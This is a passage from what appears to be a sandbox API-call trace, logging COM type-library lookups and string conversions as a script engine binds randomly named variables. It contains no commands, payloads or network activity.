_Src="_B_var_sxGccDA" | out: _Dst="_B_var_sxGccDA") returned 0x0 [0069.878] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=15, lpWideCharStr=0x144ca0, cchWideChar=15 | out: lpWideCharStr="_B_var_sxGccDA") returned 15 [0069.878] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.878] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="_B_var_sxGccDA", lHashVal=0x10efca, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.878] IUnknown:Release (This=0x665ba50) returned 0xd [0069.878] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.878] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="_B_var_sxGccDA", lHashVal=0x10efca, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.878] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.878] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.878] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="_B_var_sxGccDA", lHashVal=0x10efca, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.878] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.878] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.878] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="_B_var_sxGccDA", lHashVal=0x10efca, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.878] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.878] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.878] IUnknown:Release (This=0x665ba50) returned 0xd [0069.878] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xa871bae, cbMultiByte=15, lpWideCharStr=0x144d00, cchWideChar=16 | out: lpWideCharStr="_B_var_sxGccDA") returned 15 [0069.878] ITypeComp:RemoteBind (in: This=0x665ba60, szName="_B_var_sxGccDA", lHashVal=0x10efca, wFlags=0x5, ppTInfo=0x144cb8, pDescKind=0x144ccc, ppFuncDesc=0x144cd0, ppVarDesc=0x73005f00720061, ppTypeComp=0x63006300000000, pDummy=0x0 | out: ppTInfo=0x144cb8*=0x0, pDescKind=0x144ccc*=0, ppFuncDesc=0x144cd0, ppVarDesc=0x73005f00720061, ppTypeComp=0x63006300000000, pDummy=0x0) returned 0x0 [0069.879] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x8, _Src=0x3b82656 | out: _Dst=0x144ec0) returned 0x0 [0069.879] ITypeComp:RemoteBind (in: This=0x665ba60, szName="jXZDAUA", lHashVal=0x105754, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.879] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b826ce, cbMultiByte=8, lpWideCharStr=0x144d40, cchWideChar=9 | out: lpWideCharStr="jXZDAUA") returned 8 [0069.879] ITypeComp:RemoteBind (in: This=0x631b4d0, szName="jXZDAUA", lHashVal=0x105754, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.879] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b826ce, cbMultiByte=8, lpWideCharStr=0x144d40, cchWideChar=9 | out: lpWideCharStr="jXZDAUA") returned 8 [0069.879] ITypeComp:RemoteBind (in: This=0x665bd30, szName="jXZDAUA", lHashVal=0x105754, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.879] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="jXZDAUA") returned 0x105754 [0069.879] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x8, _Src="jXZDAUA" | out: _Dst="jXZDAUA") returned 0x0 [0069.879] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=8, lpWideCharStr=0x144af0, cchWideChar=8 | out: lpWideCharStr="jXZDAUA") returned 8 [0069.879] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.879] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="jXZDAUA", lHashVal=0x105754, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.879] IUnknown:Release (This=0x665ba50) returned 0xd [0069.879] ITypeComp:RemoteBind (in: This=0x665b4c0, szName="jXZDAUA", lHashVal=0x105754, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.879] IMalloc:Alloc (This=0x7fefec05380, cb=0xf) returned 0x68767a0 [0069.879] _mbscpy_s (in: _Dst=0x68767a0, _DstSizeInBytes=0x8, _Src=0x3b826ce | out: _Dst=0x68767a0) returned 0x0 [0069.879] strcpy_s (in: _Dst=0x144e50, _DstSize=0xf, _Src="_B_var_jXZDAUA" | out: _Dst="_B_var_jXZDAUA") returned 0x0 [0069.880] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=15, lpWideCharStr=0x144ca0, cchWideChar=15 | out: lpWideCharStr="_B_var_jXZDAUA") returned 15 [0069.880] ITypeComp:RemoteBind (in: This=0x665ba60, szName="_B_var_jXZDAUA", lHashVal=0x105ad8, wFlags=0x3, ppTInfo=0x144cb8, pDescKind=0x144ccc, ppFuncDesc=0x144cd0, ppVarDesc=0x6a005f00720061, ppTypeComp=0x41004400000000, pDummy=0x0 | out: ppTInfo=0x144cb8*=0x0, pDescKind=0x144ccc*=0, ppFuncDesc=0x144cd0, ppVarDesc=0x6a005f00720061, ppTypeComp=0x41004400000000, pDummy=0x0) returned 0x0 [0069.880] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x8, _Src=0x3b826ce | out: _Dst=0x144ec0) returned 0x0 [0069.880] ITypeComp:RemoteBind (in: This=0x665ba60, szName="fA1CAGA", lHashVal=0x1037e6, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.880] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b826f6, cbMultiByte=8, lpWideCharStr=0x144d40, cchWideChar=9 | out: lpWideCharStr="fA1CAGA") returned 8 [0069.880] ITypeComp:RemoteBind (in: This=0x631b4d0, szName="fA1CAGA", lHashVal=0x1037e6, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.880] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b826f6, cbMultiByte=8, lpWideCharStr=0x144d40, cchWideChar=9 | out: lpWideCharStr="fA1CAGA") returned 8 [0069.880] ITypeComp:RemoteBind (in: This=0x665bd30, szName="fA1CAGA", lHashVal=0x1037e6, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.880] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="fA1CAGA") returned 0x1037e6 [0069.880] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x8, _Src="fA1CAGA" | out: _Dst="fA1CAGA") returned 0x0 [0069.880] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=8, lpWideCharStr=0x144af0, cchWideChar=8 | out: lpWideCharStr="fA1CAGA") returned 8 [0069.880] ITypeComp:RemoteBind (in: This=0x665b4c0, szName="fA1CAGA", lHashVal=0x1037e6, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.880] IMalloc:Alloc (This=0x7fefec05380, cb=0xf) returned 0x68767a0 [0069.880] _mbscpy_s (in: _Dst=0x68767a0, _DstSizeInBytes=0x8, _Src=0x3b826f6 | out: _Dst=0x68767a0) returned 0x0 [0069.880] strcpy_s (in: _Dst=0x144e50, _DstSize=0xf, _Src="_B_var_fA1CAGA" | out: _Dst="_B_var_fA1CAGA") returned 0x0 [0069.880] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=15, lpWideCharStr=0x144ca0, cchWideChar=15 | out: lpWideCharStr="_B_var_fA1CAGA") returned 15 [0069.881] ITypeComp:RemoteBind (in: This=0x665ba60, szName="_B_var_fA1CAGA", lHashVal=0x102be9, wFlags=0x3, ppTInfo=0x144cb8, pDescKind=0x144ccc, ppFuncDesc=0x144cd0, ppVarDesc=0x66005f00720061, ppTypeComp=0x41004300000000, pDummy=0x0 | out: ppTInfo=0x144cb8*=0x0, pDescKind=0x144ccc*=0, ppFuncDesc=0x144cd0, ppVarDesc=0x66005f00720061, ppTypeComp=0x41004300000000, pDummy=0x0) returned 0x0 [0069.881] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x8, _Src=0x3b826f6 | out: _Dst=0x144ec0) returned 0x0 [0069.881] ITypeComp:RemoteBind (in: This=0x665ba60, szName="IAAQUocZ", lHashVal=0x1055be, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.881] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b8271e, cbMultiByte=9, lpWideCharStr=0x144d40, cchWideChar=10 | out: lpWideCharStr="IAAQUocZ") returned 9 [0069.881] ITypeComp:RemoteBind (in: This=0x631b4d0, szName="IAAQUocZ", lHashVal=0x1055be, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.881] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b8271e, cbMultiByte=9, lpWideCharStr=0x144d40, cchWideChar=10 | out: lpWideCharStr="IAAQUocZ") returned 9 [0069.881] ITypeComp:RemoteBind (in: This=0x665bd30, szName="IAAQUocZ", lHashVal=0x1055be, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.881] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="IAAQUocZ") returned 0x1055be [0069.881] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x9, _Src="IAAQUocZ" | out: _Dst="IAAQUocZ") returned 0x0 [0069.881] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=9, lpWideCharStr=0x144af0, cchWideChar=9 | out: lpWideCharStr="IAAQUocZ") returned 9 [0069.881] ITypeComp:RemoteBind (in: This=0x665b4c0, szName="IAAQUocZ", lHashVal=0x1055be, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.881] IMalloc:Alloc (This=0x7fefec05380, cb=0x10) returned 0x68767a0 [0069.881] _mbscpy_s (in: _Dst=0x68767a0, _DstSizeInBytes=0x9, _Src=0x3b8271e | out: _Dst=0x68767a0) returned 0x0 [0069.881] strcpy_s (in: _Dst=0x144e50, _DstSize=0x10, _Src="_B_var_IAAQUocZ" | out: _Dst="_B_var_IAAQUocZ") returned 0x0 [0069.881] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=16, lpWideCharStr=0x144ca0, cchWideChar=16 | out: lpWideCharStr="_B_var_IAAQUocZ") returned 16 [0069.881] ITypeComp:RemoteBind (in: This=0x665ba60, szName="_B_var_IAAQUocZ", lHashVal=0x102d47, wFlags=0x3, ppTInfo=0x144cb8, pDescKind=0x144ccc, ppFuncDesc=0x144cd0, ppVarDesc=0x49005f00720061, ppTypeComp=0x55005100000000, pDummy=0x0 | out: ppTInfo=0x144cb8*=0x0, pDescKind=0x144ccc*=0, ppFuncDesc=0x144cd0, ppVarDesc=0x49005f00720061, ppTypeComp=0x55005100000000, pDummy=0x0) returned 0x0 [0069.881] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x9, _Src=0x3b8271e | out: _Dst=0x144ec0) returned 0x0 [0069.882] ITypeComp:RemoteBind (in: This=0x665ba60, szName="wcDU1AA", lHashVal=0x10a687, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.882] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b8274a, cbMultiByte=8, lpWideCharStr=0x144d40, cchWideChar=9 | out: lpWideCharStr="wcDU1AA") returned 8 [0069.882] ITypeComp:RemoteBind (in: This=0x631b4d0, szName="wcDU1AA", lHashVal=0x10a687, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.882] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b8274a, cbMultiByte=8, lpWideCharStr=0x144d40, cchWideChar=9 | out: lpWideCharStr="wcDU1AA") returned 8 [0069.882] ITypeComp:RemoteBind (in: This=0x665bd30, szName="wcDU1AA", lHashVal=0x10a687, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.882] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="wcDU1AA") returned 0x10a687 [0069.882] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x8, _Src="wcDU1AA" | out: _Dst="wcDU1AA") returned 0x0 [0069.882] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=8, lpWideCharStr=0x144af0, cchWideChar=8 | out: lpWideCharStr="wcDU1AA") returned 8 [0069.882] ITypeComp:RemoteBind (in: This=0x665b4c0, szName="wcDU1AA", lHashVal=0x10a687, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.882] IMalloc:Alloc (This=0x7fefec05380, cb=0xf) returned 0x68767a0 [0069.882] _mbscpy_s (in: _Dst=0x68767a0, _DstSizeInBytes=0x8, _Src=0x3b8274a | out: _Dst=0x68767a0) returned 0x0 [0069.882] strcpy_s (in: _Dst=0x144e50, _DstSize=0xf, _Src="_B_var_wcDU1AA" | out: _Dst="_B_var_wcDU1AA") returned 0x0 [0069.882] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=15, lpWideCharStr=0x144ca0, cchWideChar=15 | out: lpWideCharStr="_B_var_wcDU1AA") returned 15 [0069.882] ITypeComp:RemoteBind (in: This=0x665ba60, szName="_B_var_wcDU1AA", lHashVal=0x10aa0b, wFlags=0x3, ppTInfo=0x144cb8, pDescKind=0x144ccc, ppFuncDesc=0x144cd0, ppVarDesc=0x77005f00720061, ppTypeComp=0x31005500000000, pDummy=0x0 | out: ppTInfo=0x144cb8*=0x0, pDescKind=0x144ccc*=0, ppFuncDesc=0x144cd0, ppVarDesc=0x77005f00720061, ppTypeComp=0x31005500000000, pDummy=0x0) returned 0x0 [0069.882] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x8, _Src=0x3b8274a | out: _Dst=0x144ec0) returned 0x0 [0069.882] _mbscpy_s (in: _Dst=0x68767a0, _DstSizeInBytes=0x4, _Src=0x34d2d3a | out: _Dst=0x68767a0) returned 0x0 [0069.883] _mbscpy_s (in: _Dst=0x68767a0, _DstSizeInBytes=0x4, _Src=0x34d2cea | out: _Dst=0x68767a0) returned 0x0 [0069.883] _mbscpy_s (in: _Dst=0x68767a0, _DstSizeInBytes=0x4, _Src=0x34d2cea | out: _Dst=0x68767a0) returned 0x0 [0069.883] ITypeComp:RemoteBind (in: This=0x665ba60, szName="dccAAA", lHashVal=0x1049aa, wFlags=0x5, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.883] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b826a6, cbMultiByte=7, lpWideCharStr=0x144d40, cchWideChar=8 | out: lpWideCharStr="dccAAA") returned 7 [0069.883] ITypeComp:RemoteBind (in: This=0x631b4d0, szName="dccAAA", lHashVal=0x1049aa, wFlags=0x5, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.883] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b826a6, cbMultiByte=7, lpWideCharStr=0x144d40, cchWideChar=8 | out: lpWideCharStr="dccAAA") returned 7 [0069.883] ITypeComp:RemoteBind (in: This=0x665bd30, szName="dccAAA", lHashVal=0x1049aa, wFlags=0x5, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.883] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="dccAAA") returned 0x1049aa [0069.883] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x7, _Src="dccAAA" | out: _Dst="dccAAA") returned 0x0 [0069.883] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=7, lpWideCharStr=0x144af0, cchWideChar=7 | out: lpWideCharStr="dccAAA") returned 7 [0069.883] ITypeComp:RemoteBind (in: This=0x665b4c0, szName="dccAAA", lHashVal=0x1049aa, wFlags=0x5, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.883] IMalloc:Alloc (This=0x7fefec05380, cb=0xe) returned 0x68767a0 [0069.883] _mbscpy_s (in: _Dst=0x68767a0, _DstSizeInBytes=0x7, _Src=0x3b826a6 | out: _Dst=0x68767a0) returned 0x0 [0069.883] strcpy_s (in: _Dst=0x144e50, _DstSize=0xe, _Src="_B_var_dccAAA" | out: _Dst="_B_var_dccAAA") returned 0x0 [0069.883] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=14, lpWideCharStr=0x144ca0, cchWideChar=14 | out: lpWideCharStr="_B_var_dccAAA") returned 14 [0069.883] ITypeComp:RemoteBind (in: This=0x665ba60, szName="_B_var_dccAAA", lHashVal=0x10c453, wFlags=0x5, ppTInfo=0x144cb8, pDescKind=0x144ccc, ppFuncDesc=0x144cd0, ppVarDesc=0x64005f00720061, ppTypeComp=0x41004100000000, pDummy=0x0 | out: ppTInfo=0x144cb8*=0x0, pDescKind=0x144ccc*=0, ppFuncDesc=0x144cd0, ppVarDesc=0x64005f00720061, ppTypeComp=0x41004100000000, pDummy=0x0) returned 0x0 [0069.883] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x7, _Src=0x3b826a6 | out: _Dst=0x144ec0) returned 0x0 [0069.884] ITypeComp:RemoteBind (in: This=0x665ba60, szName="GAQkAUA", lHashVal=0x10dc9c, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.884] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b8279a, cbMultiByte=8, lpWideCharStr=0x144d40, cchWideChar=9 | out: lpWideCharStr="GAQkAUA") returned 8 [0069.884] ITypeComp:RemoteBind (in: This=0x631b4d0, szName="GAQkAUA", lHashVal=0x10dc9c, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.884] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b8279a, cbMultiByte=8, lpWideCharStr=0x144d40, cchWideChar=9 | out: lpWideCharStr="GAQkAUA") returned 8 [0069.884] ITypeComp:RemoteBind (in: This=0x665bd30, szName="GAQkAUA", lHashVal=0x10dc9c, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.884] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="GAQkAUA") returned 0x10dc9c [0069.884] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x8, _Src="GAQkAUA" | out: _Dst="GAQkAUA") returned 0x0 [0069.884] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=8, lpWideCharStr=0x144af0, cchWideChar=8 | out: lpWideCharStr="GAQkAUA") returned 8 [0069.884] ITypeComp:RemoteBind (in: This=0x665b4c0, szName="GAQkAUA", lHashVal=0x10dc9c, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.884] IMalloc:Alloc (This=0x7fefec05380, cb=0xf) returned 0x68767a0 [0069.884] _mbscpy_s (in: _Dst=0x68767a0, _DstSizeInBytes=0x8, _Src=0x3b8279a | out: _Dst=0x68767a0) returned 0x0 [0069.884] strcpy_s (in: _Dst=0x144e50, _DstSize=0xf, _Src="_B_var_GAQkAUA" | out: _Dst="_B_var_GAQkAUA") returned 0x0 [0069.884] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=15, lpWideCharStr=0x144ca0, cchWideChar=15 | out: lpWideCharStr="_B_var_GAQkAUA") returned 15 [0069.884] ITypeComp:RemoteBind (in: This=0x665ba60, szName="_B_var_GAQkAUA", lHashVal=0x10e020, wFlags=0x3, ppTInfo=0x144cb8, pDescKind=0x144ccc, ppFuncDesc=0x144cd0, ppVarDesc=0x47005f00720061, ppTypeComp=0x41006b00000000, pDummy=0x0 | out: ppTInfo=0x144cb8*=0x0, pDescKind=0x144ccc*=0, ppFuncDesc=0x144cd0, ppVarDesc=0x47005f00720061, ppTypeComp=0x41006b00000000, pDummy=0x0) returned 0x0 [0069.884] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x8, _Src=0x3b8279a | out: _Dst=0x144ec0) returned 0x0 [0069.884] ITypeComp:RemoteBind (in: This=0x665ba60, szName="DQXGA_A", lHashVal=0x107826, wFlags=0x5, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.885] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b82772, cbMultiByte=8, lpWideCharStr=0x144d40, cchWideChar=9 | out: lpWideCharStr="DQXGA_A") returned 8 [0069.885] ITypeComp:RemoteBind (in: This=0x631b4d0, szName="DQXGA_A", lHashVal=0x107826, wFlags=0x5, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 